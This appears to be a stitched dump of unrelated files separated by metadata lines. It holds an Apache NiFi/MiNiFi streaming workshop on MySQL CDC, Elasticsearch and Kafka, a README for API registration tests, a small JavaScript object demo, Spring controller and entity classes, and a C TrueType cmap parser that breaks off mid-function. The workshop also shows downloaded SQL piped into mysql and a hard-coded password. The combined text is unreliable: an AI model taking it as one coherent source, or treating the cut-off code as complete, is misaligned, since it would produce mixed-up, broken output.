As a last step of this lab, let's prepare our NiFi Registry instance. NiFi Registry is a Git-like service for your NiFi flow developments. It has flow versioning features that handle the streaming aspects: in-flight data management, stopping/starting processors, queues, controller services, etc. Flows are organised in buckets, which are logical entities that group a set of flows together. A bucket can represent a project, an environment, a developer or a team. So let's create a bucket for our lab:
- Go to NiFi Registry on YOUR-CLUSTER-ADDRESS:61080/nifi-registry
- Click on the tool icon at the top right of the UI (settings)
- Click on "New bucket", name it HDF Workshop and click on create

# Lab 4
In this lab, we will use NiFi to ingest CDC data from MySQL. The MySQL DB has a table "customers" that stores information on our customers. We would like to receive each change in the table as an event (insert, update, etc) and use it with other sources to build a customer 360 view in ElasticSearch. The high level flow can be described as follows:

- Ingest events from MySQL (SRC1_CDCMySQL)
- Keep only Insert and Update events and format them into a usable JSON structure (SRC1_RouteSQLVerbe to SRC1_SetSchemaName)
- Insert and update customer data in ElasticSearch where we will build the 360 view (SRC1_MergeRecord to SRC1PutElasticRecord)
- Publish update events in Kafka to use them for fraud detection use case (SRC1_PublishKafkaUpdate)
## Enable MySQL binary logs
NiFi has a native CDC feature for MySQL databases. To use it, the MySQL DB must be configured to use binary logs. Use the following instructions to enable binary logs for the workshop DB and use ROW format CDC events.
```
sudo bash -c 'sudo cat <<EOF >> /etc/my.cnf
server_id = 1
log_bin = delta
binlog_format=row
binlog_do_db = workshop
EOF'
sudo systemctl restart mysqld.service
```
## Ingest and format data in NiFi
In the first step of this lab, we will start with a template that we have prepared for the workshop. Templates are a feature of NiFi that can be used to save, export and import NiFi flows as XML files. Start by downloading the template from here and saving it as an XML file: https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/scripts/HDF-Workshop-Bootstrap.xml
Go to the SRC1_CDCIngestion PG, click on the upload template button in the left panel (see below), select the flow template that you have previously downloaded and click on Upload. Once the template is uploaded, click on the template button in the top menu, drag it onto the canvas and release. Select your template and click Add. Several processors have now been added to your flow.

Take some time to open each processor and review its configuration. NiFi has embedded documentation for each processor. If you want to have more information on a particular processor or its parameters, right click on the processor then click on "View Usage".
Note that we are leveraging the variables we defined previously. As you can see in the CaptureChangeMySQL configuration below, we are using variables to set the MySQL configuration rather than static values. This makes flow versioning, migration and reuse easier.

The yellow "!" icon at the top left of the CDC processor shows that the processor is in an error state. To investigate, hover over the "!" icon and read the error message. It says that the processor uses a Distributed Map Cache Client that is disabled. We need to enable it before we can start the processor.

CaptureChangeMySQL is a stateful processor. It needs to keep track of information on the latest data ingested: binlog position and transaction ID. To do this, NiFi uses a component called the DistributedMapCache service, which comes with client and server parts. The Distributed MapCache Client is already created and configured for you by the template. However, you need to start it as we saw in the previous paragraph. Also, you need to add a Distributed MapCache Server from the controller services menu and enable it.

We still need to do one last thing before testing our flow. When you use NiFi templates to export/import flows, NiFi protects your passwords by deleting them. This means that the password property of the CDC processor is not set. Make sure to update the "Password" property with "StrongPassword".
Now, you can generate some data to see what CDC events look like. Use the following instructions to insert 10 customers into the MySQL DB:
```
curl "https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/scripts/create-customers-table.sql" > "create-customers-table.sql"
mysql -h localhost -u workshop -p"StrongPassword" --database=workshop < create-customers-table.sql
```
Now, select and start the CDC processor: you should get several flow files in the first queue. Start the next processor (RouteOnAttribute) and observe how data is distributed over the different relations. Go to each queue and see what the data looks like for each event. Make sure that you have 10 flow files in the "insert,update" relation, 20 in "unmatched" and 1 in "ddl".

To get update events, you can connect to the MySQL DB and update some customer information. You should get 11 flow files in the "insert,update" relation now.
```
mysql -h localhost -u root -pStrongPassword
USE workshop;
UPDATE customers SET phone='0645341234' WHERE id=1;
```
If you right click on the CDC processor, then select "view state", you can see what information the processor keeps to do the incremental work (see below). During the development phase, it is useful to delete the state and make the processor ingest the data again, which avoids touching the database to generate new events. To delete the state of a processor, you need to stop it first. This is a general rule in NiFi: each component needs to be stopped before its configuration can be modified.

Now, let's examine what's happening in our flow end-to-end. For teaching purposes, the CDC processor is configured to listen to all events. The Begin/Commit/DDL statements are not useful for us, so we need to filter them with a RouteOnAttribute processor configured as follows:

Each configuration row adds a relation to the processor and defines which flow files should be routed to this relation. We use the NiFi [Expression Language (EL)](https://nifi.apache.org/docs/nifi-docs/html/expression-language-guide.html) to implement our logic. Here, we are comparing the value of the flow file attribute "cdc.event.type" with the keywords we are looking for: insert, update, etc. NiFi has a rich expression language that can be used to work with string, arithmetic or logical operators. Here we are using the "equals" function.
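To give a concrete idea, the routing properties could be expressed with EL along these lines (an illustrative sketch based on the description above, not necessarily the exact values used in the template):
```
insert,update : ${cdc.event.type:equals('insert'):or(${cdc.event.type:equals('update')})}
ddl           : ${cdc.event.type:equals('ddl')}
```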
The next step of the flow is an EvaluateJsonPath processor that extracts the table name. This processor is used to extract information from the content of the flow file (the JSON document) and add it as flow file attributes. This is often required when you want to dynamically extract data that should live in an attribute (for routing, for instance). Here, we are looking at each JSON document, extracting the field "table_name" and adding it as an attribute called "tableName".
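A minimal configuration for this step is a single user-defined property, with the processor's Destination set to flowfile-attribute (the JSON path below is an assumption based on the field name mentioned above):
```
tableName : $.table_name
```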

As you can see, each event has a lot of additional information that is not useful for us. The next step is to keep only the data of interest and reformat the JSON file into a shape that is useful for us. NiFi has several data transformation processors that we could use here. The Jolt transformation processor is a very powerful one that can easily perform complex transformations on JSON data. We use it here with the following Jolt specification.
```
[
{
"operation": "shift",
"spec": {
"columns": {
"*": {
"@(value)": "[#1].@(1,name)"
}
}
}
}
]
```
This Jolt specification is telling NiFi to keep only attributes from the "columns" object, to shift them to the left and to keep only the "value" and "name" fields, as follows:
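To make the shift concrete, here is a simplified before/after illustration (the values are made up and a real CDC event carries more metadata; the exact output envelope may differ slightly from this sketch):
```
Input (simplified):
  {"columns": [{"name": "id", "value": 1}, {"name": "first_name", "value": "John"}]}

Output after the Jolt shift:
  [{"id": 1, "first_name": "John"}]
```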

Now that we have our data in the target JSON format, the last processor (UpdateAttribute) adds an attribute schema.name with the value of the variable ${source.schema} to set the data schema for the upcoming steps (source.schema is set to customers). This prepares our data to be used by the record-based processors and the customers schema that we added in the SR, as well as the different record readers/writers.
Once you have a clear understanding of what the template is doing, move to the next step to continue the flow development.
## Store events in ElasticSearch
Before storing data in ES, let's separate Insert and Update events. This is not strictly required, since the PutElasticSearchRecord processor supports both insert and update operations, but for other processors it may be. Also, some CDC tools generate different schemas for insert and update operations, so routing the data is required in some cases.
For routing the data, add a RouteOnAttribute processor and configure it to separate inserts from updates as follows. Connect the UpdateAttribute processor to this RouteOnAttribute processor.

Storing data in ElasticSearch event by event is not efficient and will create a huge load on the indexing service. To achieve better performance, we need to batch these events in groups. Add two MergeRecord processors (one for inserts and one for updates) and configure them as follows. **Note:** you can use copy/paste to create the second MergeRecord processor.

This configuration means that the flow files will be merged in groups of 5 events: flow files will be queued up until we have at least 5 events in the queue, then grouped into one flow file and passed to the next processor. The value 5 is for demo purposes only; you would set a higher value in real life (1000 events for instance). To avoid waiting too long when the data rate is not high, we can set the "Max Bin Age" property. Here, we are telling NiFi to merge data after 10 seconds even if we haven't reached the minimum of 5 flow files. You can also set a maximum number of records to merge if you want to avoid big batches. Min/Max settings can be set on the number of flow files or on the size of the data.
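In terms of properties, the configuration described above translates roughly into the following (reader/writer names refer to the controller services created in Lab 3; treat the exact values as a sketch):
```
Record Reader             : JsonTreeReader
Record Writer             : JsonRecordSetWriter
Merge Strategy            : Bin-Packing Algorithm
Minimum Number of Records : 5
Max Bin Age               : 10 sec
```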
Connect the RouteOnAttribute to these MergeRecord processors and use the appropriate relation. Auto-terminate the "Unmatched" relation of the RouteOnAttribute processor.

Add two PutElasticSearchHttpRecord processors and configure them as follows. Use the Index operation for the insert CDC events and the Update operation for the update CDC events. Note how easy it is to use record-based processors now that we have already prepared our schema and reader/writer. The Elastic processor configuration should be:
- ElasticSearch URL : ${elastic.url}
- Record Reader : JsonTreeReader
- Identifier Record Path : /id
- Index : ${tableName}
- Type : default
- Index Operation : index (for the first processor), update (for the second one)

Add a LogAttribute processor after the PutElasticSearchHttpRecord processors: this will be used for debugging only. Connect the different processors (RouteOnAttribute -> MergeRecord -> PutElasticSearch -> LogAttribute) as shown in the following screenshot. Pay attention to the names of the relations. For instance, connect the Merge processors to the Elastic processors using the merged relation, and auto-terminate the other relations. Start all the processors except the LogAttribute processor. Notice that data is queued in front of the merge processors for up to 10 seconds. Notice also the number of input and output flow files at the Merge processors.

Now, open ElasticSearch UI and check that your customer data has been indexed: http://YOUR-CLUSTER-IP:9200/customers/_search?pretty
## Publish update events in Kafka
The last step for this lab is to publish "update" CDC events in Kafka. These events will be used by the stream processing application to check if there's a risk of fraud. Add a PublishKafkaRecord_1_0 and configure it to use the Avro record writer as follows.
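A minimal configuration could look like the following sketch (the broker variable and topic name follow the conventions set up in Lab 3; treat the exact values as an assumption and check them against the screenshot below):
```
Kafka Brokers : ${kafka.url}
Topic Name    : customers
Record Reader : JsonTreeReader
Record Writer : AvroRecordSetWriter
```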

Now, connect the Publish Kafka processor to the Log Attribute processor and start it. To check that data is published in Kafka, use the Kafka consumer utility with this command:
```
/usr/hdf/current/kafka-broker/bin/kafka-console-consumer.sh --bootstrap-server YOUR-INTERNAL-SERVER-ADDRESS:6667 --topic customers --from-beginning
```
# Lab 5 Version flow in NiFi Registry
Now that we have our first use case implemented, let's explore the NiFi Flow Registry service. To save our flow:
- Navigate to the root NiFi canvas
- Right click on the PG SRC1_CDCIngestion
- Click on "versions" and "Start version control"
- In the popup window, you can see that the Registry and the Bucket are already populated because we have only one Registry and one bucket available. Notice also the version which is set to "1"
- Add a flow name, a flow description and a version commit, then click on save.

Notice the new green check mark on the process group. It tells us that the process group has the latest version of the flow from the registry.

Now, go to NiFi Registry and check that your flow has been successfully saved.

Now let's explore the behavior of the registry when we edit our flow.
- Go inside the process group and make several changes (processor position, processor name, processor settings). As you can see, the PG icon turns into a gray star, showing that there are local changes not yet pushed to the registry.
- Right click on the process group, select the "version" menu then "show local changes" to see what these changes are
- Right click on the process group, select the "version" menu then "commit local changes" to save the new version
- Go to the NiFi registry and check that the new version has been successfully saved

Now let's try to import our flow. Unfortunately, we don't have another cluster to deploy it so let's deploy it in the same instance.
- Click on the PG icon in the top toolbar, drag it and release.
- Click on Import instead of clicking on add
- Select your flow, and then select the version you would like to import
- Click on import and your PG and its dependencies will be added to NiFi

To finish this lab, change the value of a variable in the original PG, commit the updates, and then pull the new version in the second PG. This should not impact your local variables.
# Lab 6
The objective of this lab is to ingest web application logs with MiNiFi. Each web application generates logs on customer behaviour on the website. An event is a JSON line that describes user behaviour on a product web page (a sample event is shown after this list) and gives information on:
- Id: the user browsing the website. id = 0 means that the user is not connected or not known.
- Product: the product id that the customer has looked at.
- Sessionduration: how long the customer stayed on the product web page. A short duration means that the user is not interested by the product and is only browsing.
- Buy: a boolean that indicates if the user bought the product or not
- Price: the total amount of money that the customer spent
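Putting these fields together, a single log line could look like this (the values are made up for illustration):
```
{"id":1,"product":"98547","sessionduration":30,"buy":true,"price":1000}
```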
We will simulate the web apps by writing events directly to files inside the /tmp folder. The final objective will be to add browsing information to customer data in Elasticsearch. This will be the first step towards the customer 360 view.
## Design MiNiFi pipeline
Before working on the MiNiFi pipeline, we need to prepare an Input port to receive data from the agent. In the NiFi root Canvas, add an Input port and call it **SRC2_InputFromWebApps**.
Now, inside the NiFi Agent1_logsIngestion process group, create the MiNiFi flow as follows:

As you can see, it's a very simple pipeline that tails all web-appXXX.log files inside /tmp and sends them to our NiFi via S2S. You can enrich this pipeline later with more steps, such as compression or filtering on session duration, if you like. The TailFile configuration is described below:

Save the flow as a template and download the associated XML file.
## Deploy MiNiFi agent
MiNiFi is part of the NiFi ecosystem but is deployed separately. Currently, the deployment has to be handled (or automated) by the user. In the near future, we will build a Command & Control tool (C2) that can be used to deploy, monitor and manage a number of MiNiFi agents from a central location. Run the following instructions to install MiNiFi in /usr/hdf/current/minifi
```
sudo mkdir /usr/hdf/current/minifi
sudo mkdir /usr/hdf/current/minifi/toolkit
wget http://apache.claz.org/nifi/minifi/0.5.0/minifi-0.5.0-bin.tar.gz
tar -xvf minifi-0.5.0-bin.tar.gz
sudo cp -R minifi-0.5.0/. /usr/hdf/current/minifi
```
In addition to the MiNiFi agent, we will need the MiNiFi toolkit to convert our XML template file into a YAML file understandable by MiNiFi.
```
wget http://apache.claz.org/nifi/minifi/0.5.0/minifi-toolkit-0.5.0-bin.tar.gz
tar -xvf minifi-toolkit-0.5.0-bin.tar.gz
sudo cp -R minifi-toolkit-0.5.0/. /usr/hdf/current/minifi/toolkit
```
## Deploy MiNiFi pipeline
SCP the template you downloaded from your NiFi node to your HDF cluster. You can Curl mine and change it to add your NiFi URL in the S2S section.
```
sudo curl -sSL -o /usr/hdf/current/minifi/conf/minifi.xml https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/scripts/minifi.xml
```
Use the toolkit to convert your XML file to YAML format:
```
sudo /usr/hdf/current/minifi/toolkit/bin/config.sh transform /usr/hdf/current/minifi/conf/minifi.xml /usr/hdf/current/minifi/conf/config.yml
```
Now start the MiNiFi agent and look at the logs:
```
sudo /usr/hdf/current/minifi/bin/minifi.sh start
tail -f /usr/hdf/current/minifi/logs/minifi-app.log
```
## Design NiFi pipeline
Inside the SRC2_LogsIngestion PG, create the NiFi pipeline that will process data coming from our agent. The general flow is:
- Receive data through S2S
- Filter events based on the sessionduration. We consider that a customer who spends less than 20 seconds on a product page is not interested. We will filter these events and ignore them.
- Filter unknown users' browsing events (id=0). These events can be browsing activity from a customer who is not logged in or from an unknown visitor. We can store these events in HDFS for other use cases such as product recommendations. In a real-life scenario, a browsing session would have an ID that can be used to link the browsing history to a user once they log in.
- For the other events, we will do two things:
- Update customer data in Elasticsearch to include the products that the customer has looked at. For the sake of simplicity, we will store only the last item. If you want to keep a complete list, you can use ElasticSearch API with scripts feature (eg. "source": "ctx.source.products.add(params.product)")
- Convert logs event to Avro and publish them to Kafka. These events will be used by SAM in the fraud detection use case. The final flow looks like the below:

Start by adding an Input port followed by an UpdateAttribute processor that adds an attribute schema.name with the value ${source.schema}.
To route events based on the different business rules, we will use an interesting record processor that leverages Calcite to run SQL on flow files. Add a QueryRecord processor and configure it as shown below:

As you can see, this processor will create two relations (unknown and validsessions) and route data according to the SQL query. Note that a subset of fields can be selected also (ex. SELECT id, sessionduration from FLOWFILE).
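Based on the business rules above, the two dynamic properties could contain queries along these lines (an illustrative sketch, not necessarily the exact queries shown in the screenshot):
```
-- validsessions: known customers with a meaningful browsing session
SELECT * FROM FLOWFILE WHERE id <> 0 AND sessionduration >= 20

-- unknown: anonymous sessions kept for other use cases such as recommendations
SELECT * FROM FLOWFILE WHERE id = 0 AND sessionduration >= 20
```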
Route data coming from the unknown relation to HDFS.
Route data coming from validsessions to Kafka. In the PublishKafkaRecord, use the AvroRecordSetWriter as Record Writer to publish data in Avro format. Remember that we set **Schema Write Strategy** of the Avro Writer to **HWX Content-Encoded Schema Reference**. This means that each Kafka message will have the schema reference encoded in the first byte of the message (required by SAM).

Now let's update our Elasticsearch index to add data on customer browsing behaviors. To learn how to do schema conversion with record-based processors, let's consider that we only want to store the browsed product ID and the session duration, not the information on whether the customer bought the product. To implement this, we need a ConvertRecord processor.
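The effect of the conversion is simply to drop the fields that are not part of the logs_view schema, for example (illustrative values):
```
Input  (logs schema)     : {"id":1,"product":"98547","sessionduration":30,"buy":true,"price":1000}
Output (logs_view schema): {"id":1,"product":"98547","sessionduration":30}
```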

As you can see, I had to create a new JsonRecordSetWriter to specify the write schema, which is different from the read schema referenced by the attribute **schema.name**. The **Views JsonRecordSetWriter** should be configured as below. Note that the Schema Name field is set to logs_view, which we have already defined in our schema registry. We can avoid hard-coding the schema in the record writer by creating global read/write controllers and using two attributes: schema.name.input and schema.name.output.

Add a PutElasticsearchHttpRecord processor and configure it to update your customer data.
Now let's test the end-to-end flow by creating a file in /tmp with some log events.
```
cat <<EOF >> /tmp/web-app.log
{"id":2,"product":"12321","sessionduration":60,"buy":"false"}
{"id":0,"product":"24234","sessionduration":120,"buy":"false"}
{"id":10,"product":"233","sessionduration":5,"buy":"true","price":2000}
{"id":1,"product":"98547","sessionduration":30,"buy":"true","price":1000}
EOF
```
You should see data flowing from the MiNiFi agent to NiFi through S2S. Data will be filtered, routed, and stored in Kafka and Elasticsearch. Check the data in Elasticsearch and confirm that browsing information has been added to customers 1 and 2. Also check that one event goes through the unknown connection.
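If you would rather verify from a terminal than from the Elasticsearch UI, a small script along the following lines can pull the customer documents back out. This is only a sketch: the endpoint, index name, and query field are assumptions and should be adapted to the index you created earlier in the workshop.
```python
# Verification sketch only -- the Elasticsearch endpoint, index name and query
# field are assumptions; adapt them to your own environment.
import json
import requests

ES_URL = "http://localhost:9200"   # assumed Elasticsearch endpoint
INDEX = "customers"                # assumed index holding the customer documents

for customer_id in (1, 2):
    resp = requests.get(f"{ES_URL}/{INDEX}/_search", params={"q": f"id:{customer_id}"})
    hits = resp.json().get("hits", {}).get("hits", [])
    # After the flow has run, the browsing fields (product, sessionduration)
    # should appear in each customer's document.
    for hit in hits:
        print(customer_id, json.dumps(hit["_source"], indent=2))
```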
|
Markdown
|
UTF-8
| 2,293 | 3.546875 | 4 |
[] |
no_license
|
# Test the Registration and Recovery API
### This repository contains tests for the /register and /recover API endpoints of [customerpay.me](staging.api.customerpay.me)
To run the tests, you will need to have Node.js installed on your chosen platform.
The test application uses the built-in Node.js 'https' module to make API calls to the endpoints.
The test defines a module called 'regandrec.js' that defines two functions, 'register()' and 'recoverPwd()', which test the /register and /recover endpoints respectively.
To run the test, you need to clone this repository, create a JavaScript file in the cloned repository and write JavaScript code that imports the test functions, e.g.:
var myTest = require('./regandrec');
## Registration test
For the registration test, you will call the 'register()' function, which takes the user's phone number, password, country and state, in that order, as strings, e.g.
myTest.register('2349888888888', 'p@$$w0rd' , 'Nigeria' , 'Imo');
If the user does not already exist, the function returns and logs the string "User registration successful".
If the user already exists, it returns and logs the string "User already exists".
Otherwise it returns and logs the string "An unknown error occurred"
>*Note that the function returns the string "Incorrect arguments" if it is called without the complete arguments or with arguments that are not strings.*
## Recovery test
For the recovery test, you will call the 'recoverPwd()' function, which takes the user's phone number as a string, e.g.
myTest.recoverPwd('2349888888888');
If the user already exists, the function returns and logs the string "Recovery email sent successfully".
If the user does not exist, it returns and logs the string "User not found".
Otherwise it returns and logs the string "An unknown error occurred"
>*Note that the function returns the string "Incorrect arguments" if it is called without the complete arguments or with arguments that are not strings.*
You can run the test by passing the name of your test file to the 'node' command, e.g.
> $ node test.js
An example test code *exampletest.js* has been attached to illustrate the calls. Run
> $ node exampletest.js
Simply comment out one of the functions to test the other, and change the parameters as desired.
|
JavaScript
|
UTF-8
| 337 | 4.1875 | 4 |
[
"MIT"
] |
permissive
|
//Object
//Creating an object
const person = {
  name: 'John', // name
  age: 30, // age
  weight: 88.6, // weight
  isAdmin: true
}
//To get a property of this object and print it to the screen
console.log(person)
console.log(person.name)
console.log(person.age)
console.log(`${person.name} is ${person.age} years old`)
|
Java
|
UTF-8
| 2,143 | 2.4375 | 2 |
[] |
no_license
|
package magazineIndex.controller;
import java.util.ArrayList;
import java.util.List;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.ui.Model;
import magazineIndex.repository.PublicationRepository;
import magazineIndex.repository.IssueRepository;
import magazineIndex.viewClasses.SeedsView;
@Controller
public class MagazineController {
private final PublicationRepository pRepo;
private final IssueRepository iRepo;
private static final Logger log = LoggerFactory.getLogger(MagazineController.class);
@Autowired
public MagazineController(PublicationRepository pRepo, IssueRepository iRepo) {
this.pRepo = pRepo;
this.iRepo = iRepo;
}
// index page
@RequestMapping(value = "/index")
public String index(Model model) {
List<SeedsView> bob = new ArrayList<SeedsView>();
bob.add(new SeedsView("1", "2", "3"));
model.addAttribute("seedstarter", bob);
return "index";
}
@RequestMapping(value = "")
public String index() {
return "index";
}
@RequestMapping(value="seeds")
public String seeds() {
return "seeds";
}
// // not working attempt to have a default page.
// @RequestMapping(value = "*")
// public String getFallback(@RequestParam("name") String name, HttpServletRequest request) {
// String path = request.getServletPath();
// log.error("unknown path: " + path);
// return "index";
// }
/*
// show blank add form
@GetMapping("/issue/new")
public String showNewIssueForm(Issue issue) {
return "issue/add";
}
// process result of filled in add form
@PostMapping("/issue/add")
public String newIssue(@Valid Issue issue, BindingResult result, Model model) {
if (result.hasErrors()) {
return "issue/add";
}
iRepo.save(issue);
model.addAttribute("issues", iRepo.findAll());
return "issue/list";
}
*/
}
|
Java
|
UTF-8
| 1,762 | 2.640625 | 3 |
[] |
no_license
|
package com.kindleparser.parser.entities;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
@Entity
@Table(name = "Book")
public class Book {
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
private Long bookId;
private String bookTitle;
private Long authorId1;
private Long authorId2;
private Long authorId3;
	public Book() {} // no-argument constructor required by JPA

	public Book(String bookTitle) {
		this.bookTitle = bookTitle;
	}
public Book(String bookTitle, Long authorId1) {
this.bookTitle = bookTitle;
this.authorId1 = authorId1;
}
public Book(String bookTitle, Long authorId1, Long authorId2) {
this.bookTitle = bookTitle;
this.authorId1 = authorId1;
this.authorId2 = authorId2;
}
public Book(String bookTitle, Long authorId1, Long authorId2, Long authorId3 ) {
this.bookTitle = bookTitle;
this.authorId1 = authorId1;
this.authorId2 = authorId2;
this.authorId3 = authorId3;
}
@Column(name = "bookId", nullable = false)
public Long getBookId() {
return bookId;
}
public void setBookId(Long bookId) {
this.bookId = bookId;
}
public String getBookTitle() {
return bookTitle;
}
public void setBookTitle(String bookTitle) {
this.bookTitle = bookTitle;
}
public Long getAuthorId1() {
return authorId1;
}
public void setAuthorId1(Long authorId1) {
this.authorId1 = authorId1;
}
public Long getAuthorId2() {
return authorId2;
}
public void setAuthorId2(Long authorId2) {
this.authorId2 = authorId2;
}
public Long getAuthorId3() {
return authorId3;
}
public void setAuthorId3(Long authorId3) {
this.authorId3 = authorId3;
}
}
|
C
|
UTF-8
| 18,384 | 3.296875 | 3 |
[] |
no_license
|
/***************************
* フォントファイル処理
**************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include "fontfile.h"
//=============================
// 基本処理
//=============================
/* オフセットテーブルを読み込み */
static void _read_offset_table(Font *p)
{
TableItem *ti;
int num;
//バージョン
font_read32(p);
//テーブル数
num = font_read16(p);
//skip
font_seek_cur(p, 2 * 3);
//データ確保
ti = (TableItem *)malloc(sizeof(TableItem) * (num + 1));
if(!ti) return;
p->table = ti;
//TableRecord
for(; num > 0; num--, ti++)
{
//識別子
ti->name = font_read32(p);
//チェックサム
font_seek_cur(p, 4);
//オフセット位置
ti->offset = font_read32(p);
//長さ
font_seek_cur(p, 4);
}
//データ終了
ti->name = ti->offset = 0;
}
/* フォント閉じる*/
void font_close(Font *p)
{
if(p)
{
if(p->gind_table)
free(p->gind_table);
if(p->table)
free(p->table);
if(p->fp_output)
fclose(p->fp_output);
fclose(p->fp);
}
}
/* フォントファイルを開く
*
* フォントコレクションの場合は、1番目のフォント。
*
* return: NULL で失敗 */
Font *font_open_file(char *filename)
{
Font *p;
FILE *fp;
uint32_t ver;
//ファイル開く
fp = fopen(filename, "rb");
if(!fp)
{
printf("can't open '%s'\n", filename);
return NULL;
}
//Font 確保
p = (Font *)calloc(1, sizeof(Font));
if(!p)
{
fclose(fp);
return NULL;
}
p->fp = fp;
//オフセットテーブルへ
ver = font_read32(p);
if(ver == 0x74746366)
{
//[フォントコレクション]
//バージョン・フォント数をスキップ
font_seek_cur(p, 8);
//1番目のフォントのオフセット位置へ
font_seek(p, font_read32(p));
}
else
//ファイル位置クリア
rewind(p->fp);
//オフセットテーブル読み込み
_read_offset_table(p);
return p;
}
/* 出力用のテキストファイルを開く */
int font_open_output_file(Font *p,char *filename)
{
p->fp_output = fopen(filename, "wt");
if(!p->fp_output)
{
printf("! can't open '%s'\n", filename);
return 1;
}
return 0;
}
/* 指定テーブルの位置へ
*
* return: 0 で成功、1 で見つからなかった */
int font_goto_table(Font *p,uint32_t name)
{
TableItem *ti;
for(ti = p->table; ti->name; ti++)
{
if(ti->name == name)
{
p->cur_table_offset = ti->offset;
font_seek(p, ti->offset);
return 0;
}
}
return 1;
}
/* GSUB テーブルへ移動し、先頭データ読み込み
*
* offset_dat に各テーブルのオフセット位置が入る。
*
* return: 0 で成功、1 で失敗 */
int font_goto_GSUB(Font *p)
{
uint16_t majver,minver;
if(font_goto_table(p, FONT_MAKE_TAG('G','S','U','B')))
{
printf("not found 'GSUB'\n");
return 1;
}
majver = font_read16(p);
minver = font_read16(p);
p->offset_dat[0] = font_read16(p);
p->offset_dat[1] = font_read16(p);
p->offset_dat[2] = font_read16(p);
printf("---- GSUB ----\n\n");
printf("version: %d.%d\n", majver, minver);
printf("scriptListOffset: %d\n", p->offset_dat[0]);
printf("featureListOffset: %d\n", p->offset_dat[1]);
printf("lookupListOffset: %d\n\n", p->offset_dat[2]);
return 0;
}
/* GPOS テーブルへ移動し、先頭データ読み込み
*
* offset_dat に各テーブルのオフセット位置が入る。
*
* return: 0 で成功、1 で失敗 */
int font_goto_GPOS(Font *p)
{
uint16_t majver,minver;
if(font_goto_table(p, FONT_MAKE_TAG('G','P','O','S')))
{
printf("not found 'GPOS'\n");
return 1;
}
majver = font_read16(p);
minver = font_read16(p);
p->offset_dat[0] = font_read16(p);
p->offset_dat[1] = font_read16(p);
p->offset_dat[2] = font_read16(p);
printf("---- GPOS ----\n\n");
printf("version: %d.%d\n", majver, minver);
printf("scriptListOffset: %d\n", p->offset_dat[0]);
printf("featureListOffset: %d\n", p->offset_dat[1]);
printf("lookupListOffset: %d\n\n", p->offset_dat[2]);
return 0;
}
/* head テーブルを読み込み
*
* units_per_em, loca_format */
void font_read_table_head(Font *p)
{
if(font_goto_table(p, FONT_MAKE_TAG('h','e','a','d')))
return;
font_seek_cur(p, 18);
p->units_per_em = font_read16(p);
font_seek_cur(p, 30);
p->loca_format = (int16_t)font_read16(p);
}
/* maxp テーブルを読み込み
*
* glyph_nums */
void font_read_table_maxp(Font *p)
{
if(font_goto_table(p, FONT_MAKE_TAG('m','a','x','p')))
return;
//version
font_seek_cur(p, 4);
//glyphNums
p->glyph_nums = font_read16(p);
}
//=============================
// cmap
//=============================
/* format 4 : Unicode BMP */
static void _read_cmap_format4(Font *p)
{
uint8_t *dat,*pend,*pstart,*pdelta,*poffset;
uint16_t end,start,rangeoffset;
int16_t delta;
uint32_t *ptable;
int i,c,gind,len,segcnt;
//format
if(font_read16(p) != 4) return;
//len
len = font_read16(p);
//language
font_seek_cur(p, 2);
//segCountX2
segcnt = font_read16(p) / 2;
//skip
font_seek_cur(p, 2 * 3);
//endCode 以降のデータを読み込み
len -= 2 * 7;
dat = (uint8_t *)malloc(len);
if(!dat) return;
fread(dat, 1, len, p->fp);
pend = dat;
pstart = dat + segcnt * 2 + 2;
pdelta = pstart + segcnt * 2;
poffset = pdelta + segcnt * 2;
ptable = p->gind_table;
//
for(i = 0; i < segcnt; i++)
{
//endCode
end = readbuf16(pend);
//startCode
start = readbuf16(pstart);
//idDelta
delta = (int16_t)readbuf16(pdelta);
//idRangeOffset
rangeoffset = readbuf16(poffset);
//Unicode:start - end までのグリフインデックスを算出し、セット
for(c = start; c <= end; c++)
{
if(rangeoffset == 0)
gind = (c + delta) & 0xffff;
else
gind = readbuf16(poffset + rangeoffset + (c - start) * 2);
if(gind)
ptable[gind] = c;
}
//次のセグメントへ
pend += 2;
pstart += 2;
pdelta += 2;
poffset += 2;
}
free(dat);
}
/* format 12 : Unicode full */
static void _read_cmap_format12(Font *p)
{
uint32_t num,start,end,gid,c,*ptable;
//format
if(font_read16(p) != 12) return;
//skip
font_seek_cur(p, 2 + 4 + 4);
//グループ数
num = font_read32(p);
ptable = p->gind_table;
for(; num > 0; num--)
{
start = font_read32(p);
end = font_read32(p);
gid = font_read32(p);
for(c = start; c <= end; c++)
ptable[c - start + gid] = c;
}
}
/* グリフインデックス->Unicode 変換テーブルの生成 */
void font_make_gindex_table(Font *p)
{
uint32_t *pd,offset;
uint16_t ver,num,platform,encoding,flags = 0;
//cmap テーブルへ
if(font_goto_table(p, FONT_MAKE_TAG('c','m','a','p')))
return;
//確保
pd = (uint32_t *)calloc(1, 4 * 65536);
if(!pd) return;
p->gind_table = pd;
//cmap テーブル読み込み
ver = font_read16(p);
num = font_read16(p);
if(ver != 0) return;
for(; num > 0; num--)
{
platform = font_read16(p);
encoding = font_read16(p);
offset = font_read32(p);
//Unicode BMP
if(!(flags & 1)
&& ((platform == 0 && encoding == 3)
|| (platform == 3 && encoding == 1)))
{
font_save_pos(p);
font_seek_from_table(p, offset);
_read_cmap_format4(p);
font_load_pos(p);
flags |= 1;
}
//Unicode full
if(!(flags & 2)
&& ((platform == 0 && encoding == 4)
|| (platform == 3 && encoding == 10)))
{
font_save_pos(p);
font_seek_from_table(p, offset);
_read_cmap_format12(p);
font_load_pos(p);
flags |= 2;
}
}
}
/* cmap を使って、Unicode -> グリフID
*
* return: 見つからなかったら 0 */
int font_cmap_get_glyph_id(Font *p,uint32_t code)
{
uint16_t num1,plat,enc,end,st,range;
int16_t delta;
uint32_t offset;
int i,segcnt,seek_segcnt;
//cmap テーブルへ
if(font_goto_table(p, FONT_MAKE_TAG('c','m','a','p')))
return 0;
//version
if(font_read16(p) != 0) return 0;
//Unicode BMP を見つける
num1 = font_read16(p);
